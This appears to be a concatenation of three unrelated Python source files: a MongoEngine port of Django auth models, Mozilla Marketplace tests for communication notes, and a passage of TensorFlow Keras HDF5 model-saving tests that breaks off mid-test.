# unique_together = (('content_type', 'codename'),)
# ordering = ('content_type__app_label', 'content_type__model', 'codename')
def __unicode__(self):
return u"%s | %s | %s" % (
unicode(self.content_type.app_label),
unicode(self.content_type),
unicode(self.name))
def natural_key(self):
return (self.codename,) + self.content_type.natural_key()
natural_key.dependencies = ['contenttypes.contenttype']
class Group(Document):
"""Groups are a generic way of categorizing users to apply permissions,
or some other label, to those users. A user can belong to any number of
groups.
A user in a group automatically has all the permissions granted to that
group. For example, if the group Site editors has the permission
can_edit_home_page, any user in that group will have that permission.
Beyond permissions, groups are a convenient way to categorize users to
apply some label, or extended functionality, to them. For example, you
could create a group 'Special users', and you could write code that would
do special things to those users -- such as giving them access to a
members-only portion of your site, or sending them members-only
e-mail messages.
"""
name = StringField(max_length=80, unique=True, verbose_name=_('name'))
permissions = ListField(ReferenceField(Permission, verbose_name=_('permissions'), required=False))
class Meta:
verbose_name = _('group')
verbose_name_plural = _('groups')
def __unicode__(self):
return self.name
class UserManager(models.Manager):
def create_user(self, username, email, password=None):
"""
Creates and saves a User with the given username, e-mail and password.
"""
now = datetime_now()
# Normalize the address by lowercasing the domain part of the email
# address.
try:
email_name, domain_part = email.strip().split('@', 1)
except ValueError:
pass
else:
email = '@'.join([email_name, domain_part.lower()])
user = self.model(username=username, email=email, is_staff=False,
is_active=True, is_superuser=False, last_login=now,
date_joined=now)
user.set_password(password)
user.save(using=self._db)
return user
def create_superuser(self, username, email, password):
u = self.create_user(username, email, password)
u.is_staff = True
u.is_active = True
u.is_superuser = True
u.save(using=self._db)
return u
def make_random_password(self, length=10, allowed_chars='abcdefghjkmnpqrstuvwxyzABCDEFGHJKLMNPQRSTUVWXYZ23456789'):
"Generates a random password with the given length and given allowed_chars"
# Note that default value of allowed_chars does not have "I" or letters
# that look like it -- just to avoid confusion.
from random import choice
return ''.join([choice(allowed_chars) for i in range(length)])
class User(Document):
"""A User document that aims to mirror most of the API specified by Django
at http://docs.djangoproject.com/en/dev/topics/auth/#users
"""
username = StringField(max_length=30, required=True,
verbose_name=_('username'),
help_text=_("Required. 30 characters or fewer. Letters, numbers and @/./+/-/_ characters"))
first_name = StringField(max_length=30,
verbose_name=_('first name'))
last_name = StringField(max_length=30,
verbose_name=_('last name'))
email = EmailField(verbose_name=_('e-mail address'))
password = StringField(max_length=128,
verbose_name=_('password'),
help_text=_("Use '[algo]$[iterations]$[salt]$[hexdigest]' or use the <a href=\"password/\">change password form</a>."))
is_staff = BooleanField(default=False,
verbose_name=_('staff status'),
help_text=_("Designates whether the user can log into this admin site."))
is_active = BooleanField(default=True,
verbose_name=_('active'),
help_text=_("Designates whether this user should be treated as active. Unselect this instead of deleting accounts."))
is_superuser = BooleanField(default=False,
verbose_name=_('superuser status'),
help_text=_("Designates that this user has all permissions without explicitly assigning them."))
last_login = DateTimeField(default=datetime_now,
verbose_name=_('last login'))
date_joined = DateTimeField(default=datetime_now,
verbose_name=_('date joined'))
user_permissions = ListField(ReferenceField(Permission), verbose_name=_('user permissions'),
help_text=_('Permissions for the user.'))
USERNAME_FIELD = 'username'
REQUIRED_FIELDS = ['email']
meta = {
'allow_inheritance': True,
'indexes': [
{'fields': ['username'], 'unique': True, 'sparse': True}
]
}
def __unicode__(self):
return self.username
def get_full_name(self):
"""Returns the users first and last names, separated by a space.
"""
full_name = u'%s %s' % (self.first_name or '', self.last_name or '')
return full_name.strip()
def is_anonymous(self):
return False
def is_authenticated(self):
return True
def set_password(self, raw_password):
"""Sets the user's password - always use this rather than directly
assigning to :attr:`~django_me.auth.User.password` as the
password is hashed before storage.
"""
self.password = make_password(raw_password)
self.save()
return self
def check_password(self, raw_password):
"""Checks the user's password against a provided password - always use
this rather than directly comparing to
:attr:`~django_me.auth.User.password` as the password is
hashed before storage.
"""
return check_password(raw_password, self.password)
@classmethod
def create_user(cls, username, password, email=None):
"""Create (and save) a new user with the given username, password and
email address.
"""
now = datetime_now()
# Normalize the address by lowercasing the domain part of the email
# address.
if email is not None:
try:
email_name, domain_part = email.strip().split('@', 1)
except ValueError:
pass
else:
email = '@'.join([email_name, domain_part.lower()])
user = cls(username=username, email=email, date_joined=now)
user.set_password(password)
user.save()
return user
def get_group_permissions(self, obj=None):
"""
Returns a list of permission strings that this user has through his/her
groups. This method queries all available auth backends. If an object
is passed in, only permissions matching this object are returned.
"""
permissions = set()
for backend in auth.get_backends():
if hasattr(backend, "get_group_permissions"):
permissions.update(backend.get_group_permissions(self, obj))
return permissions
def get_all_permissions(self, obj=None):
return _user_get_all_permissions(self, obj)
def has_perm(self, perm, obj=None):
"""
Returns True if the user has the specified permission. This method
queries all available auth backends, but returns immediately if any
backend returns True. Thus, a user who has permission from a single
auth backend is assumed to have permission in general. If an object is
provided, permissions for this specific object are checked.
"""
# Active superusers have all permissions.
if self.is_active and self.is_superuser:
return True
# Otherwise we need to check the backends.
return _user_has_perm(self, perm, obj)
def has_module_perms(self, app_label):
"""
Returns True if the user has any permissions in the given app label.
Uses pretty much the same logic as has_perm, above.
"""
# Active superusers have all permissions.
if self.is_active and self.is_superuser:
return True
return _user_has_module_perms(self, app_label)
def email_user(self, subject, message, from_email=None):
"Sends an e-mail to this User."
from django.core.mail import send_mail
send_mail(subject, message, from_email, [self.email])
def get_profile(self):
"""
Returns site-specific profile for this user. Raises
SiteProfileNotAvailable if this site does not allow profiles.
"""
if not hasattr(self, '_profile_cache'):
from django.conf import settings
if not getattr(settings, 'AUTH_PROFILE_MODULE', False):
raise SiteProfileNotAvailable('You need to set AUTH_PROFILE_MO'
'DULE in your project settings')
try:
app_label, model_name = settings.AUTH_PROFILE_MODULE.split('.')
except ValueError:
raise SiteProfileNotAvailable('app_label and model_name should'
' be separated by a dot in the AUTH_PROFILE_MODULE set'
'ting')
try:
model = models.get_model(app_label, model_name)
if model is None:
raise SiteProfileNotAvailable('Unable to load the profile '
'model, check AUTH_PROFILE_MODULE in your project sett'
'ings')
self._profile_cache = model._default_manager.using(self._state.db).get(user__id__exact=self.id)
self._profile_cache.user = self
except (ImportError, ImproperlyConfigured):
raise SiteProfileNotAvailable
return self._profile_cache
class MongoUserManager(UserManager):
"""A User manager wich allows the use of MongoEngine documents in Django.
To use the manager, you must tell django.contrib.auth to use MongoUser as
the user model. In you settings.py, you need:
INSTALLED_APPS = (
...
'django.contrib.auth',
'django_me.mongo_auth',
...
)
AUTH_USER_MODEL = 'mongo_auth.MongoUser'
Django will use the model object to access the custom Manager, which will
replace the original queryset with MongoEngine querysets.
By default, django_me.mongo_auth.models.User will be used to store users. You
can specify another document class in MONGOENGINE_USER_DOCUMENT in your
settings.py.
The User Document class has the same requirements as a standard custom user
model: https://docs.djangoproject.com/en/dev/topics/auth/customizing/
In particular, the User Document class must define USERNAME_FIELD and
REQUIRED_FIELDS.
`AUTH_USER_MODEL` has been added in Django 1.5.
"""
def contribute_to_class(self, model, name):
super(MongoUserManager, self).contribute_to_class(model, name)
self.dj_model = self.model
self.model = get_user_document()
self.dj_model.USERNAME_FIELD = self.model.USERNAME_FIELD
username = models.CharField(_('username'), max_length=30, unique=True)
username.contribute_to_class(self.dj_model, self.dj_model.USERNAME_FIELD)
self.dj_model.REQUIRED_FIELDS = self.model.REQUIRED_FIELDS
for name in self.dj_model.REQUIRED_FIELDS:
field = models.CharField(_(name), max_length=30)
field.contribute_to_class(self.dj_model, name)
def get(self, *args, **kwargs):
try:
return self.get_query_set().get(*args, **kwargs)
except self.model.DoesNotExist:
# ModelBackend expects this exception
raise self.dj_model.DoesNotExist
@property
def db(self):
raise NotImplementedError
def get_empty_query_set(self):
return self.model.objects.none()
def get_query_set(self):
return self.model.objects
class MongoUser(models.Model):
""""Dummy user model for Django.
MongoUser is used to replace Django's UserManager with MongoUserManager.
The actual user document class is django_me.auth.User or any
other document class specified in MONGOENGINE_USER_DOCUMENT.
To get the user document class, use `get_user_document()`.
"""
objects = MongoUserManager()
class Meta:
app_label = 'mongo_auth'
def set_password(self, password):
"""Doesn't do anything, but works around the issue with Django 1.6."""
make_password(password)
| |
from django.core.files.uploadedfile import SimpleUploadedFile
import mock
from nose.tools import eq_
from mkt.comm.forms import CommAttachmentFormSet
from mkt.comm.tests.test_views import AttachmentManagementMixin
from mkt.comm.utils import create_comm_note
from mkt.constants import comm
from mkt.site.tests import TestCase, user_factory
from mkt.site.utils import app_factory, extension_factory
class TestCreateCommNote(TestCase, AttachmentManagementMixin):
def setUp(self):
self.contact = user_factory(email='contact')
self.user = user_factory()
self.grant_permission(self.user, '*:*')
self.app = app_factory(mozilla_contact=self.contact.email)
def test_create_thread(self):
# Default permissions.
thread, note = create_comm_note(
self.app, self.app.current_version, self.user, 'huehue',
note_type=comm.APPROVAL)
# Check Thread.
eq_(thread.addon, self.app)
eq_(thread.version, self.app.current_version)
expected = {
'public': False, 'developer': True, 'reviewer': True,
'senior_reviewer': True, 'mozilla_contact': True, 'staff': True}
for perm, has_perm in expected.items():
eq_(getattr(thread, 'read_permission_%s' % perm), has_perm, perm)
# Check Note.
eq_(note.thread, thread)
eq_(note.author, self.user)
eq_(note.body, 'huehue')
eq_(note.note_type, comm.APPROVAL)
# Check CC.
eq_(thread.thread_cc.count(), 2)
assert thread.thread_cc.filter(user=self.contact).exists()
assert thread.thread_cc.filter(user=self.user).exists()
def test_create_note_existing_thread(self):
# Initial note.
thread, note = create_comm_note(
self.app, self.app.current_version, self.user, 'huehue')
# Second note from contact.
thread, reply = create_comm_note(
self.app, self.app.current_version, self.contact, 'euheuh!',
note_type=comm.REJECTION)
# Third person joins thread.
thread, last_word = create_comm_note(
self.app, self.app.current_version, user_factory(), 'euheuh!',
note_type=comm.MORE_INFO_REQUIRED)
eq_(thread.thread_cc.count(), 3)
def test_create_note_no_author(self):
thread, note = create_comm_note(
self.app, self.app.current_version, None, 'huehue')
eq_(note.author, None)
@mock.patch('mkt.comm.utils.post_create_comm_note', new=mock.Mock)
def test_create_note_reviewer_type(self):
for note_type in comm.REVIEWER_NOTE_TYPES:
thread, note = create_comm_note(
self.app, self.app.current_version, None, 'huehue',
note_type=note_type)
eq_(note.read_permission_developer, False)
@mock.patch('mkt.comm.utils.post_create_comm_note', new=mock.Mock)
def test_custom_perms(self):
thread, note = create_comm_note(
self.app, self.app.current_version, self.user, 'escalatedquickly',
note_type=comm.ESCALATION, perms={'developer': False,
'staff': True})
expected = {
'public': False, 'developer': False, 'reviewer': True,
'senior_reviewer': True, 'mozilla_contact': True, 'staff': True}
for perm, has_perm in expected.items():
eq_(getattr(thread, 'read_permission_%s' % perm), has_perm, perm)
@mock.patch('mkt.comm.utils.post_create_comm_note', new=mock.Mock)
def test_attachments(self):
attach_formdata = self._attachment_management_form(num=2)
attach_formdata.update(self._attachments(num=2))
attach_formset = CommAttachmentFormSet(
attach_formdata,
{'form-0-attachment':
SimpleUploadedFile(
'lol', attach_formdata['form-0-attachment'].read()),
'form-1-attachment':
SimpleUploadedFile(
'lol2', attach_formdata['form-1-attachment'].read())})
thread, note = create_comm_note(
self.app, self.app.current_version, self.user, 'lol',
note_type=comm.APPROVAL, attachments=attach_formset)
eq_(note.attachments.count(), 2)
class TestCreateCommNoteExtensions(TestCase, AttachmentManagementMixin):
def setUp(self):
self.user = user_factory()
self.grant_permission(self.user, '*:*')
self.extension = extension_factory()
def test_create_thread(self):
# Default permissions.
thread, note = create_comm_note(
self.extension, self.extension.latest_version, self.user, 'huehue',
note_type=comm.APPROVAL)
# Check Thread.
eq_(thread.obj, self.extension)
eq_(thread._extension, self.extension)
eq_(thread.version, self.extension.latest_version)
eq_(thread._extension_version, self.extension.latest_version)
expected = {
'public': False, 'developer': True, 'reviewer': True,
'senior_reviewer': True, 'mozilla_contact': True, 'staff': True}
for perm, has_perm in expected.items():
eq_(getattr(thread, 'read_permission_%s' % perm), has_perm, perm)
# Check Note.
eq_(note.thread, thread)
eq_(note.author, self.user)
eq_(note.body, 'huehue')
eq_(note.note_type, comm.APPROVAL)
# Check CC.
eq_(thread.thread_cc.count(), 1)
assert thread.thread_cc.filter(user=self.user).exists()
def test_create_note_existing_thread(self):
# Initial note.
thread, note = create_comm_note(
self.extension, self.extension.latest_version, self.user, 'huehue')
# Second person joins thread.
thread, last_word = create_comm_note(
self.extension, self.extension.latest_version, user_factory(),
'euheuh!', note_type=comm.MORE_INFO_REQUIRED)
eq_(thread.thread_cc.count(), 2)
def test_create_note_no_author(self):
thread, note = create_comm_note(
self.extension, self.extension.latest_version, None, 'huehue')
eq_(note.author, None)
@mock.patch('mkt.comm.utils.post_create_comm_note', new=mock.Mock)
def test_create_note_reviewer_type(self):
for note_type in comm.REVIEWER_NOTE_TYPES:
thread, note = create_comm_note(
self.extension, self.extension.latest_version, None, 'huehue',
note_type=note_type)
eq_(note.read_permission_developer, False)
@mock.patch('mkt.comm.utils.post_create_comm_note', new=mock.Mock)
def test_custom_perms(self):
thread, note = create_comm_note(
self.extension, self.extension.latest_version, self.user,
'escalatedquickly', note_type=comm.ESCALATION,
perms={'developer': False, 'staff': True})
expected = {
'public': False, 'developer': False, 'reviewer': True,
'senior_reviewer': True, 'mozilla_contact': True, 'staff': True}
for perm, has_perm in expected.items():
eq_(getattr(thread, 'read_permission_%s' % perm), has_perm, perm)
@mock.patch('mkt.comm.utils.post_create_comm_note', new=mock.Mock)
def test_attachments(self):
attach_formdata = self._attachment_management_form(num=2)
attach_formdata.update(self._attachments(num=2))
attach_formset = CommAttachmentFormSet(
attach_formdata,
{'form-0-attachment':
SimpleUploadedFile(
'lol', attach_formdata['form-0-attachment'].read()),
'form-1-attachment':
SimpleUploadedFile(
'lol2', attach_formdata['form-1-attachment'].read())})
thread, note = create_comm_note(
self.extension, self.extension.latest_version, self.user, 'lol',
note_type=comm.APPROVAL, attachments=attach_formset)
eq_(note.attachments.count(), 2)
| |
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#,============================================================================
"""Tests for model saving in the HDF5 format."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import shutil
import tempfile
from absl.testing import parameterized
import numpy as np
from tensorflow.python import keras
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.keras import optimizers
from tensorflow.python.keras.engine import training
from tensorflow.python.keras.saving import hdf5_format
from tensorflow.python.lib.io import file_io
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import checkpoint_management
from tensorflow.python.training import training as training_module
from tensorflow.python.training.tracking import util as trackable
try:
import h5py # pylint:disable=g-import-not-at-top
except ImportError:
h5py = None
class TestWeightSavingAndLoading(test.TestCase, parameterized.TestCase):
@test_util.run_in_graph_and_eager_modes
def test_weight_loading(self):
with self.cached_session():
a = keras.layers.Input(shape=(2,))
x = keras.layers.Dense(3)(a)
b = keras.layers.Dense(1)(x)
model = keras.models.Model(a, b)
x = np.random.random((3, 2))
ref_y = model.predict(x)
weights = model.get_weights()
model.set_weights(weights)
y = model.predict(x)
self.assertAllClose(ref_y, y)
with self.assertRaises(ValueError):
model.set_weights(weights[1:])
with self.assertRaises(ValueError):
model.set_weights(weights[::-1])
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir)
no_extension_path = os.path.join(temp_dir, 'test')
model.save_weights(no_extension_path, save_format='tf')
model.load_weights(no_extension_path)
y = model.predict(x)
self.assertAllClose(ref_y, y)
if h5py is None:
return # Skip rest of test if H5py isn't available.
h5_path = os.path.join(temp_dir, 'test.h5')
model.save_weights(h5_path)
model.load_weights(h5_path)
y = model.predict(x)
self.assertAllClose(ref_y, y)
model.load_weights(h5_path, by_name=True)
y = model.predict(x)
self.assertAllClose(ref_y, y)
model.save_weights(no_extension_path, save_format='hdf5')
model.load_weights(no_extension_path)
y = model.predict(x)
self.assertAllClose(ref_y, y)
@test_util.run_in_graph_and_eager_modes
def test_weight_preprocessing(self):
input_dim = 3
output_dim = 3
size = 2
cases = [
[
(keras.layers.Bidirectional(keras.layers.SimpleRNN(2))),
[np.random.random((2, 1)), np.random.random((2, 1))],
(None, 3, 2),
],
[
(keras.layers.TimeDistributed(keras.layers.Dense(1))),
[np.random.random((2, 1)), np.random.random((1,))],
(None, 3, 2),
],
[
(keras.layers.Conv1D(output_dim, size, use_bias=False)),
[np.random.random((output_dim, input_dim, size, 1))],
(None, 4, input_dim),
],
[
(keras.layers.Conv2D(output_dim, size,
use_bias=False, data_format='channels_first')),
[np.random.random((output_dim, input_dim, size, size))],
(None, input_dim, 4, 4),
],
[
(keras.layers.Conv2DTranspose(output_dim, size,
use_bias=False,
data_format='channels_first')),
[np.random.random((output_dim, input_dim, size, size))],
(None, input_dim, 4, 4),
],
[
(keras.layers.Conv2DTranspose(output_dim, size,
use_bias=False,
data_format='channels_last')),
[np.random.random((size, size, input_dim, output_dim))],
(None, 4, 4, input_dim),
],
[
(keras.layers.Conv3D(output_dim, size,
use_bias=False, data_format='channels_first')),
[np.random.random((output_dim, input_dim, size, size, size))],
(None, input_dim, 4, 4, 4),
],
[
(keras.layers.GRU(output_dim)),
[np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,)),
np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,)),
np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,))],
(None, 4, input_dim),
],
[
(keras.layers.LSTM(output_dim)),
[np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,)),
np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,)),
np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,)),
np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,))],
(None, 4, input_dim),
],
]
for layer, weights, input_shape in cases:
layer.build(input_shape)
_ = hdf5_format.preprocess_weights_for_loading(
layer, weights, original_keras_version='1')
model = keras.models.Sequential([keras.layers.Dense(2, input_dim=2)])
_ = hdf5_format.preprocess_weights_for_loading(
model, model.weights, original_keras_version='1')
x = keras.Input((2,))
y = keras.layers.Dense(2)(x)
model = keras.models.Model(x, y)
_ = hdf5_format.preprocess_weights_for_loading(
model, model.weights, original_keras_version='1')
@parameterized.named_parameters(
('gru', keras.layers.GRU, {
'units': 2,
'input_shape': (3, 5)
}),
('gru_with_reset_after', keras.layers.GRU, {
'units': 2,
'input_shape': (3, 5),
'reset_after': True
}),
('lstm', keras.layers.LSTM, {
'units': 2,
'input_shape': (3, 5)
}),
('cudnngru', keras.layers.CuDNNGRU, {
'units': 2,
'input_shape': (3, 5)
}),
('cudnnlstm', keras.layers.CuDNNLSTM, {
'units': 2,
'input_shape': (3, 5)
}))
def test_preprocess_weights_for_loading_rnn_should_be_idempotent(
self, layer_class, layer_args):
with self.cached_session():
layer = layer_class(**layer_args)
layer.build(input_shape=layer_args.get('input_shape'))
weights1 = layer.get_weights()
weights2 = hdf5_format.preprocess_weights_for_loading(
layer, weights1)
_ = [
self.assertAllClose(x, y, rtol=1e-05)
for (x, y) in zip(weights1, weights2)
]
@test_util.run_in_graph_and_eager_modes
def test_sequential_weight_loading(self):
if h5py is None:
return
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir)
h5_path = os.path.join(temp_dir, 'test.h5')
num_hidden = 5
input_dim = 3
batch_size = 5
num_classes = 2
with self.cached_session():
model = keras.models.Sequential()
model.add(keras.layers.Dense(num_hidden, input_dim=input_dim))
model.add(keras.layers.Dense(num_classes))
x = np.random.random((batch_size, input_dim))
ref_y = model.predict(x)
model.save_weights(h5_path)
model = keras.models.Sequential()
model.add(keras.layers.Dense(num_hidden, input_dim=input_dim))
model.add(keras.layers.Dense(num_classes))
model.load_weights(h5_path)
y = model.predict(x)
self.assertAllClose(y, ref_y)
@test_util.run_in_graph_and_eager_modes
def test_sequential_weight_loading_group_name_with_incorrect_length(self):
if h5py is None:
return
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir)
h5_path = os.path.join(temp_dir, 'test.h5')
num_hidden = 5
input_dim = 3
num_classes = 2
with self.cached_session():
ref_model = keras.models.Sequential()
ref_model.add(keras.layers.Dense(num_hidden, input_dim=input_dim,
name='d1'))
ref_model.add(keras.layers.Dense(num_classes, name='d2'))
ref_model.compile(loss=keras.losses.MSE,
optimizer=keras.optimizers.RMSprop(lr=0.0001),
metrics=[keras.metrics.categorical_accuracy])
f_ref_model = h5py.File(h5_path, 'w')
hdf5_format.save_weights_to_hdf5_group(f_ref_model, ref_model.layers)
f_model = h5py.File(h5_path, 'r')
model = keras.models.Sequential()
model.add(keras.layers.Dense(num_hidden, use_bias=False,
input_dim=input_dim, name='d1'))
model.add(keras.layers.Dense(num_classes, name='d2'))
model.compile(loss=keras.losses.MSE,
optimizer=keras.optimizers.RMSprop(lr=0.0001),
metrics=[keras.metrics.categorical_accuracy])
with self.assertRaisesRegexp(ValueError,
r'Layer #0 \(named \"d1\"\) expects 1 '
r'weight\(s\), but the saved weights have 2 '
r'element\(s\)\.'):
hdf5_format.load_weights_from_hdf5_group_by_name(f_model, model.layers)
@test_util.run_deprecated_v1
def test_sequential_weight_loading_group_name_with_incorrect_shape(self):
if h5py is None:
return
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir)
h5_path = os.path.join(temp_dir, 'test.h5')
num_hidden = 5
input_dim = 3
num_classes = 2
with self.cached_session():
ref_model = keras.models.Sequential()
ref_model.add(keras.layers.Dense(num_hidden, input_dim=input_dim,
name='d1'))
ref_model.add(keras.layers.Dense(num_classes, name='d2'))
ref_model.compile(loss=keras.losses.MSE,
optimizer=keras.optimizers.RMSprop(lr=0.0001),
metrics=[keras.metrics.categorical_accuracy])
f_ref_model = h5py.File(h5_path, 'w')
hdf5_format.save_weights_to_hdf5_group(f_ref_model, ref_model.layers)
f_model = h5py.File(h5_path, 'r')
model = keras.models.Sequential()
model.add(keras.layers.Dense(num_hidden + 5, input_dim=input_dim,
name='d1'))
model.add(keras.layers.Dense(num_classes, name='d2'))
model.compile(loss=keras.losses.MSE,
optimizer=keras.optimizers.RMSprop(lr=0.0001),
metrics=[keras.metrics.categorical_accuracy])
with self.assertRaisesRegexp(ValueError,
r'Layer #0 \(named "d1"\), weight '
r'<tf\.Variable \'d1_1\/kernel:0\' '
r'shape=\(3, 10\) dtype=float32> has '
r'shape \(3, 10\), but the saved weight has '
r'shape \(3, 5\)\.'):
hdf5_format.load_weights_from_hdf5_group_by_name(f_model, model.layers)
class TestWholeModelSaving(test.TestCase):
@test_util.run_v1_only('b/120994067')
def test_sequential_model_saving(self):
if h5py is None:
self.skipTest('h5py required to run this test')
with self.cached_session():
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.RepeatVector(3))
model.add(keras.layers.TimeDistributed(keras.layers.Dense(3)))
model.compile(
loss=keras.losses.MSE,
optimizer=keras.optimizers.RMSprop(lr=0.0001),
metrics=[
keras.metrics.categorical_accuracy,
keras.metrics.CategoricalCrossentropy(
name='cce', label_smoothing=constant_op.constant(0.2)),
],
weighted_metrics=[
keras.metrics.categorical_crossentropy,
keras.metrics.CategoricalCrossentropy(
name='cce', label_smoothing=constant_op.constant(0.2)),
],
sample_weight_mode='temporal')
x = np.random.random((1, 3))
y = np.random.random((1, 3, 3))
model.train_on_batch(x, y)
out = model.predict(x)
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
new_model = keras.models.load_model(fname)
os.close(fd)
os.remove(fname)
out2 = new_model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
# test that new updates are the same with both models
x = np.random.random((1, 3))
y = np.random.random((1, 3, 3))
model.train_on_batch(x, y)
new_model.train_on_batch(x, y)
x = np.random.random((1, 3))
y = np.random.random((1, 3, 3))
eval_out = model.evaluate(x, y)
eval_out2 = new_model.evaluate(x, y)
self.assertArrayNear(eval_out, eval_out2, 0.001)
out = model.predict(x)
out2 = new_model.predict(x)
# TODO(b/120930751) This tolerance should be 1e-05,
# very concerning that its not.
self.assertAllClose(out, out2, atol=1e-03)
@test_util.run_deprecated_v1
def test_sequential_model_saving_without_input_shape(self):
if h5py is None:
self.skipTest('h5py required to run this test')
with self.cached_session():
model = keras.models.Sequential()
model.add(keras.layers.Dense(2))
model.add(keras.layers.RepeatVector(3))
model.add(keras.layers.TimeDistributed(keras.layers.Dense(3)))
model.compile(
loss=keras.losses.MSE,
optimizer=keras.optimizers.RMSprop(lr=0.0001),
metrics=[
keras.metrics.categorical_accuracy,
keras.metrics.CategoricalAccuracy()
],
weighted_metrics=[
keras.metrics.categorical_accuracy,
keras.metrics.CategoricalAccuracy()
],
sample_weight_mode='temporal')
x = np.random.random((1, 3))
y = np.random.random((1, 3, 3))
model.train_on_batch(x, y)
out = model.predict(x)
fd, fname = tempfile.mkstemp('.h5', dir=self.get_temp_dir())
model.save(fname)
new_model = keras.models.load_model(fname)
os.close(fd)
os.remove(fname)
out2 = new_model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
def test_sequential_model_saving_without_compile(self):
if h5py is None:
self.skipTest('h5py required to run this test')
with self.cached_session():
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.RepeatVector(3))
model.add(keras.layers.TimeDistributed(keras.layers.Dense(3)))
x = np.random.random((1, 3))
out = model.predict(x)
fd, fname = tempfile.mkstemp('.h5')
# Save the model without any compilation or training.
keras.models.save_model(model, fname)
new_model = keras.models.load_model(fname)
os.close(fd)
os.remove(fname)
out2 = new_model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
@test_util.run_deprecated_v1
def test_sequential_model_saving_2(self):
if h5py is None:
self.skipTest('h5py required to run this test')
with self.cached_session():
# test with custom optimizer, loss
class CustomOp(keras.optimizers.RMSprop):
pass
def custom_loss(y_true, y_pred):
return keras.losses.mse(y_true, y_pred)
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.Dense(3))
model.compile(loss=custom_loss, optimizer=CustomOp(), metrics=['acc'])
x = np.random.random((1, 3))
y = np.random.random((1, 3))
model.train_on_batch(x, y)
out = model.predict(x)
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
model = keras.models.load_model(
fname,
custom_objects={'CustomOp': CustomOp,
'custom_loss': custom_loss})
os.close(fd)
os.remove(fname)
out2 = model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
@test_util.run_deprecated_v1
def test_functional_model_saving(self):
if h5py is None:
self.skipTest('h5py required to run this test')
with self.cached_session():
inputs = keras.layers.Input(shape=(3,))
x = keras.layers.Dense(2)(inputs)
output = keras.layers.Dense(3)(x)
model = keras.models.Model(inputs, output)
model.compile(
loss=keras.losses.MSE,
optimizer=keras.optimizers.RMSprop(lr=0.0001),
metrics=[
keras.metrics.categorical_accuracy,
keras.metrics.CategoricalAccuracy()
],
weighted_metrics=[
keras.metrics.categorical_accuracy,
keras.metrics.CategoricalAccuracy()
])
x = np.random.random((1, 3))
y = np.random.random((1, 3))
model.train_on_batch(x, y)
out = model.predict(x)
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
model = keras.models.load_model(fname)
os.close(fd)
os.remove(fname)
out2 = model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
def test_saving_without_compilation(self):
if h5py is None:
self.skipTest('h5py required to run this test')
with self.cached_session():
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.Dense(3))
model.compile(loss='mse', optimizer='sgd', metrics=['acc'])
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
model = keras.models.load_model(fname)
os.close(fd)
os.remove(fname)
def test_saving_with_tf_optimizer(self):
if h5py is None:
self.skipTest('h5py required to run this test')
with self.cached_session():
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.Dense(3))
model.compile(loss='mse',
optimizer=training_module.AdadeltaOptimizer(0.1),
metrics=['acc'])
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
model = keras.models.load_model(fname)
os.close(fd)
os.remove(fname)
def test_saving_right_after_compilation(self):
if h5py is None:
self.skipTest('h5py required to run this test')
with self.cached_session():
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.Dense(3))
model.compile(loss='mse', optimizer='sgd', metrics=['acc'])
model._make_train_function()
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
model = keras.models.load_model(fname)
os.close(fd)
os.remove(fname)
def test_saving_lambda_numpy_array_arguments(self):
with self.cached_session():
if h5py is None:
self.skipTest('h5py required to run this test')
mean = np.random.random((4, 2, 3))
std = np.abs(np.random.random((4, 2, 3))) + 1e-5
inputs = keras.layers.Input(shape=(4, 2, 3))
output = keras.layers.Lambda(lambda image, mu, std: (image - mu) / std,
arguments={'mu': mean, 'std': std})(inputs)
model = keras.models.Model(inputs, output)
model.compile(loss='mse', optimizer='sgd', metrics=['acc'])
fd, fname = tempfile.mkstemp('.h5')
